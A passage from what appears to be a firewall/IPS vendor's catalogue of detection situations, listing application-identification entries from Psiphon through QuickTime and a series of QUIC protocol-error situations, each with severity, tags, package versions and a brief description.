Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-1805-5242
Description: Psiphon is an internet proxy connection service.
Back to top

Ptc

About this situation: Application Ptc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PTC enables manufacturers to achieve product and service advantage in the age of the Internet of Things. The company's technology solutions transform the way smart, connected products are created, operated and serviced.
Back to top

Public-Folder-HelpDesk

About this situation: Application Public-Folder-HelpDesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Collaborate on helpdesk tickets in Outlook. Create tickets from email or web. Attached files and rich text. Sort tickets. Iinformation from Contacts or GAL. For public folder or shared mailbox.
Back to top

PubNub

About this situation: PubNub usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-771-5211
Description: PubNub is a global data stream network for IoT, mobile and web applications.
Back to top

Pulse-360

About this situation: Application Pulse-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Online advertising and marketing network, specializing in search targeted sponsored links and eventually branched out into content targeted sponsored links
Back to top

PulsePoint

About this situation: PulsePoint usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: PulsePoint is a company specialized in advertising.
Back to top

Pulseway

About this situation: Application Pulseway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pulseway is a mobile remote monitoring and management software that gives you complete control of your servers, applications and computers.
Back to top

PulsRadio

About this situation: PulsRadio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-628-5211
Description: PulsRadio is an Internet radio service.
Back to top

PunchTab

About this situation: Application PunchTab detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PunchTab is a multi-channel loyalty and engagement platform that enables agencies, brands and enterprise organizations to incentivize user behavior and drive business success. PunchTab customers use the company's flexible solutions to deepen audience engagement and build awareness by leveraging everything from social sharing and UGC and awareness campaigns to sophisticated B2E and B2B programs.
Back to top

PuppetLabs

About this situation: Application PuppetLabs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Puppet develops IT automation software. Its flagship products, puppet and puppet enterprise, are designed to allow companies to automate configuration management and infrastructure, cut costs and help organizations better handle infrastructure management at scale.
Back to top

Purchase-Control

About this situation: Application Purchase-Control detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Purchase Control is a web based Purchase Order System which can be quickly set up for multiple sites and departments without any work from your IT department.
Back to top

Pusher

About this situation: Application Pusher detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pusher is a cloud-based tech platform enabling developers to create collaborative tools, multiplayer games, chat and real-time dashboards.
Back to top

Put.io

About this situation: Put.io usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Put.io downloads and puts torrents into your personal, private online space.
Back to top

Putlocker

About this situation: Putlocker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-630-5211
Description: Putlocker is a free service that lets users upload and share files.
Back to top

PuTTY

About this situation: Endpoint Context Agent based PuTTY
Context: EI Correlation
Severity: 1
Tags: Remote Administration, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: PuTTY endpoint application has been detected.
Back to top

PwC

About this situation: Application PwC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PricewaterhouseCoopers
Back to top

Pydio

About this situation: Application Pydio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pydio is a software solution for file sharing and synchronization.
Back to top

Pyramid-Analytics

About this situation: Application Pyramid-Analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pyramid Analytics provides business intelligence software that delivers data-driven insights for organizations with advanced analytics and data visualizations.
Back to top

Python-Package-Manager

About this situation: pip usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1805-5242
Description: Pip is a package manager for python.
Back to top

PythonAnywhere

About this situation: Application PythonAnywhere detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PythonAnywhere is an online Integrated Development Environment and Web hosting service based on the Python programming language. It provides in-browser access to server-based Python and Bash Command-line interfaces, along with a code editor with Syntax highlighting.
Back to top

Q2

About this situation: Application Q2 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Q2 offers virtual banking software for financial institutions. It designs virtual, mobile and voice banking applications.
Back to top

Q4-CMMS-software

About this situation: Application Q4-CMMS-software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Q4 CMMS software provides with a robust set of capabilities designed to meet the demanding needs of asset intensive organisations that must keep their sites operating at peak performance.
Back to top

QAD

About this situation: Application QAD detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QAD provides cloud enterprise software solutions for manufacturers. Its solutions are ERP, MRP, supply chain and manufacturing business software for global enterprises.
Back to top

Qarbon

About this situation: Application Qarbon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qarbon publishes and supplies presentation software to enhance online training, marketing, sales, and support to customers worldwide.
Back to top

QBox

About this situation: Application QBox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qbox.io is ridiculously simple hosted Elasticsearch.
Back to top

QDown

About this situation: QDown usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-630-5211
Description: QDown is a Korean download site and peer to peer file sharing service which has a downloadable, p2p agent that is run on the peer machine.
Back to top

Qeshow

About this situation: Qeshow usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This application provides audio and video chat, and is popular in China.
Back to top

Qhub

About this situation: Qhub usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Description: Q and A software integrates seamlessly with your website which help build your business, engaging and understanding your customers.
Back to top

Qianlong

About this situation: Qianlong usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Qianlong are located information centers, community centers, video center, technology center, value-added business, marketing, sales, office, Finance Department, Human Resources etc
Back to top

Qihoo-360

About this situation: Qihoo 360 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-771-5211
Description: Qihoo 360 Technology Co. Ltd., or Qihoo 360, is an internet security company.
Back to top

Qik

About this situation: qik usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows users to stream live video from their cell phones to the Internet. Source: Wikipedia
Back to top

Qlik

About this situation: Application Qlik detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qlik is a data discovery delivering solutions for self-service data visualization and guided analytics.
Back to top

Qlogitek

About this situation: Application Qlogitek detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QLogitek is a B2B-EDI Supply Chain Solutions provider and a globally recognized Application Integrator for its Microsoft BizTalk Server expertise. The QLogitek suite of products connect enterprises with their trading partners to enable an array of supply chain processes such as EDI exchange for supplier order fulfillment, inbound management for distribution centre optimization, repair-order tracking, scan-based trading, product lifecycle management, and claims management.
Back to top

QMusic

About this situation: Application QMusic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QMusic is a point of contact and interface for emerging artists and industry workers within the wider music industry.
Back to top

Qooling

About this situation: Application Qooling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qooling is a QHSE management application with features such as dashboards, integrations, and document management.
Back to top

QPR-Suite

About this situation: Application QPR-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QPR Suite forms one platform to manage all phases of risk management. QPR provides solutions for strategy execution, performance and process management, process mining and enterprise architecture.
Back to top

QQ-Games

About this situation: QQ Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

QQ-Mail

About this situation: QQ mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1151-5242
Description: QQ was initially developed by Tencent Inc. in February 1999.QQ currently allows free registration for membership.
Back to top

QQ-Video

About this situation: QQ Video usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1317-5242
Description: A video-streaming site
Back to top

QQLIVE

About this situation: QQLive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1151-5242
Description: A P2P streaming video network that allows streaming video, including TV and radio channels to be much more smooth
Back to top

Qt-Cloud-Services

About this situation: Application Qt-Cloud-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qt Cloud Services allow build, test and deploy applications on a scalable and reliable infrastructure. Computing, storage and application services for your web, mobile, desktop or embedded solutions.
Back to top

Quadax

About this situation: Application Quadax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quadax is a trusted partner, industry expert, proven resource and a dedicated provider in the complex world of healthcare and related auditing services.
Back to top

Quadrant

About this situation: Application Quadrant detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quadrant 4 System Corporation provides information technology
Back to top

Qualaroo

About this situation: Application Qualaroo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qualaroo is a marketing software company that creates solutions to help companies understand and harness web visitor intent to drive more conversions.
Back to top

Qualauncher

About this situation: Endpoint Context Agent based Qualauncher detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1180-5242
Description: A network connection initiated by Qualauncher was detected. Qualauncher (culauncher.exe) is a tool by Microsoft to improve the reliability of Windows Update.
Back to top

Qualifacts

About this situation: Application Qualifacts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qualifacts CareLogic Enterprise is a comprehensive Electronic Health Record designed for behavioral health, mental health and human services agencies.
Back to top

Qualio

About this situation: Application Qualio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qualio is the all-in-one compliance management platform that helps you bring products to market faster and achieve 100 percent FDA, ISO, GxP compliance in audits.
Back to top

Quality-Systems-Enhancement

About this situation: Application Quality-Systems-Enhancement detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quality Systems Enhancement is a consulting and training organization for automotive, aerospace, electronics, healthcare, packaging, telecommunication industries.
Back to top

QualitySystems

About this situation: Application QualitySystems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QualitySystems develops and provides computer-based practice management, medical records, and e-business applications for medical and dental group practices.
Back to top

Qualtrics

About this situation: qualtrics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Qualtrics provides the platform that gives real time insights to users so that fact based decisions can be made.
Back to top

Qualys

About this situation: qualys usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Qualys scan your network, servers, desktops or web apps for security vulnerabilities.Scan computers and apps on the Internet or in your network
Back to top

Quandora

About this situation: Application Quandora detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quandora helps companies foster a community of continuous learning and employee engagement through the act of asking questions. Quandora enables users to ask questions, share knowledge, and learn on a platform that is accessible team members.
Back to top

Quantcast

About this situation: Quantcast usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-1086-5242
Description: Quantcast is an online statistics and analytics service.
Back to top

Quantcast-Measure

About this situation: Quantcast Measure usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Quantcast Measure provides integrated data on app traffic, installs and return usage as well as audience site visit frequency, traffic by device, app version, as well as top countries and top devices for a given app..
Back to top

Quantifi

About this situation: Application Quantifi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quantifi is a provider of risk, analytics and trading solutions for the global capital markets and commodities industries.
Back to top

Quantum

About this situation: Application Quantum detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quantum Corporation is a manufacturer of tape drive, tape automation, and disk-based data deduplication backup, recovery and deduplication storage products for physical, virtual and cloud environments.
Back to top

Quantum-Metric

About this situation: Quantum Metric usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1769-5242
Description: Quantum Metric is an analytics platform.
Back to top

Quantumretail

About this situation: Application Quantumretail detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quantumretail - includes the following solutions
Back to top

QuantumSecure

About this situation: Application QuantumSecure detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quantum Secure is a provider of enterprise software to manage and streamline security identities, compliance and events across disparate physical security systems.
Back to top

Qubole-Data-Service

About this situation: Application Qubole-Data-Service detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Qubole provides a managed Big Data service that makes it to prepare, integrate and explore Big Data in the cloud.
Back to top

QuestBack

About this situation: Application QuestBack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Questback develops and sells software and services for the collection, analysis and monitoring of business critical feedback platform that helps companies understand customers, engage employees and outperform markets
Back to top

Questback-Digium-Enterprise

About this situation: Questback Digium Enterprise usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-595-5211
Description: Questback Digium Enterprise is an online survey management service.
Back to top

Questdiagnostics

About this situation: Application Questdiagnostics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quest Diagnostics empowers people to take action to improve health outcomes. Derived from the database of clinical lab results, diagnostic insights reveal new avenues to identify and treat disease, inspire healthy behaviors and improve health care management.
Back to top

Questia

About this situation: Application Questia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Questia - online research library with access to books, journals, articles, and encyclopedias plus helpful citation tools.
Back to top

Questia-School

About this situation: Application Questia-School detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Built for secondary and high schools, Questia School is the premier online research library, featuring thousands of digital books, millions of academic articles and robust productivity tools for secondary school students.
Back to top

Questionpro

About this situation: QuestionPro usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: QuestionPro or QuestionPro.com is online survey software that allows users to create, publish and distribute online surveys and analyze the results.
Back to top

QUIC

About this situation: QUIC traffic
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1727-5242
Description: QUIC protocol usage. QUIC is a secure transport layer protocol functioning over UDP. QUIC is specified in RFC 9000.
Back to top

QUIC-Other

About this situation: QUIC connection with something else than web or SMB traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A QUIC connection with something else than web or SMB traffic inside was seen. The TLS handshake has either indicated that the protocol inside the tunnel is not HTTP and not SMB, or it did not indicate the protocol at all. This application can be used for controlling all QUIC connections with something else than web or SMB traffic inside.
Back to top

QUIC-SMB

About this situation: QUIC connection with SMB traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A QUIC connection with SMB traffic inside was seen. The TLS handshake has indicated that the protocol inside the tunnel is SMB. This application can be used for controlling all SMB based QUIC traffic.
Back to top

QUIC-Web

About this situation: QUIC connection with web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A QUIC connection with web traffic inside was seen. The TLS handshake has indicated that the protocol inside the tunnel is HTTP/3. This application can be used for controlling all web based QUIC traffic.
Back to top

Quickbase

About this situation: QuickBase usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1238-5242
Description: Intuit QuickBase is a business software platform that allows users to create and customize their cloud based business application.
Back to top

QuickBooks-Online

About this situation: QuickBooks Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1238-5242
Description: QuickBooks Online usage has been detected.
Back to top

QuickCap

About this situation: Application QuickCap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QuickCap is a healthcare claim processing system that is built for IPAs, PHOs, MSOs and other management organizations. It is designed to process EDI and manual claims, capitation, eligibility, referrals, authorizations, premium billing etc.
Back to top

Quicken

About this situation: Application Quicken detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quicken is a provider of personal finance software.
Back to top

QuickTate

About this situation: Application QuickTate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QuickTate provides transcription services and allows users to transcribe voicemails, personal dictations, call recordings.
Back to top

Quickthreads

About this situation: Application Quickthreads detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Quickthreads can send RSS/XML feeds to your email box. Syndicated content which is updated frequently can be emailed to you daily, when it's convenient for you.
Back to top

QuickTime

About this situation: QuickTime usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: A proprietary multimedia framework developed by Apple; Source Wikipedia
Back to top

QUIC_Client-Aead-Limit-Exceeded

About this situation: QUIC client AEAD encryption limit has been exceeded
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The QUIC client AEAD encryption limit has been exceeded and updating the keys is no longer possible.
Back to top

QUIC_Client-Connection-Closing

About this situation: QUIC client operation failed due to closing connection
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An operation requested by the client failed because the QUIC connection is closing.
Back to top

QUIC_Client-Connection-Draining

About this situation: QUIC client operation failed due to draining connection
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An operation requested by the client failed because the QUIC connection is draining.
Back to top

QUIC_Client-Connection-Id-Limit-Exceeded

About this situation: QUIC client has exceeded the connection ID limit
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The number of connection IDs sent by the client exceeds the acceptable limit specified in the transport parameters.
Back to top

QUIC_Client-Connection-Id-Not-Available

About this situation: New QUIC client connection id not available
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: There is no unused QUIC connection ID available to be allocated when migrating a connection from the client to the server.
Back to top

QUIC_Client-Crypto-Buffer-Exceeded

About this situation: Buffer for QUIC client CRYPTO frames exceeded
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The amount of handshake data from QUIC CRYPTO frames sent by the client exceeds the reserved buffer space.
Back to top

QUIC_Client-Crypto-Error

About this situation: Cryptographic error on data sent by QUIC client
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A TLS cryptographic operation on data sent by the QUIC client has failed.
Back to top

QUIC_Client-Decrypt-Error

About this situation: QUIC client TLS decrypt error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: Doing TLS decrypting on data sent by the QUIC client has failed.
Back to top

QUIC_Client-Drop-Connection

About this situation: Connection dropped due to unspecified error in QUIC client traffic
Context: QUIC
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: There was an unspecified error in processing QUIC traffic sent by the client. The error requires the connection to be dropped. This can be caused by client software that does not actually use the QUIC protocol or does not follow it strictly or by an internal error in the QUIC inspection. The connection cannot be continued; the action for this situation is always Terminate.
Back to top

QUIC_Client-Final-Size-Error

About this situation: QUIC client stream final size error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The final size of a QUIC stream is different than what the client announced.
Back to top

QUIC_Client-Flow-Contol-Error

About this situation: QUIC client flow control error has occurred
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A QUIC flow control error has occurred in traffic from the client to the server.
Back to top

QUIC_Client-Frame-Encoding-Error

About this situation: QUIC client frame encoding error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A QUIC packet sent by the client has an error in the frame encoding.
Back to top

QUIC_Client-Incompatible-Version

About this situation: QUIC client uses an incompatible QUIC version
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The QUIC version that the client uses is not compatible with NGFW.
Back to top

QUIC_Client-Invalid-Ack-Frame

About this situation: A QUIC ACK frame sent by the client is not a valid
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A QUIC packet sent by the client contains an invalid ACK frame.
Back to top

QUIC_Client-Invalid-Operation

About this situation: QUIC client operation not allowed
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An operation requested by the client is not allowed at the current state of the QUIC connection.
Back to top

QUIC_Client-Invalid-Packet

About this situation: A packet sent by the client is not a valid QUIC packet
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A packet sent by the client is not a valid QUIC packet as defined in [RFC 9000].
Back to top

QUIC_Client-Invalid-Stream-Operation

About this situation: QUIC client stream operation not allowed
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An operation requested by the client is not allowed at the current state of the QUIC stream.
Back to top

QUIC_Client-Invalid-Transport-Param

About this situation: QUIC client transport parameter is not valid
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: A QUIC transport parameter sent by the client is not valid.
Back to top

QUIC_Client-Packet-Error

About this situation: QUIC packet sent by the client could not be processed
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred when handling a QUIC packet sent by the client.
Back to top

QUIC_Client-Path-Probe-Error

About this situation: QUIC client path probe error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred when probing the QUIC path from the client to the server.
Back to top

QUIC_Client-Path-Validation-Error

About this situation: QUIC client path validation error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: An error occurred when validating the QUIC path from the client to the server.
Back to top

QUIC_Client-Pkt-Num-Not-Available

About this situation: QUIC packet number not available
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: Sending a QUIC packet from the client to the server failed because a packet number can't be allocated.
Back to top

QUIC_Client-Protocol-Error

About this situation: Generic QUIC client protocol error
Context: QUIC
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: Traffic sent by the client has led to a violation of the QUIC protocol as defined in [RFC 9000].
Back to top

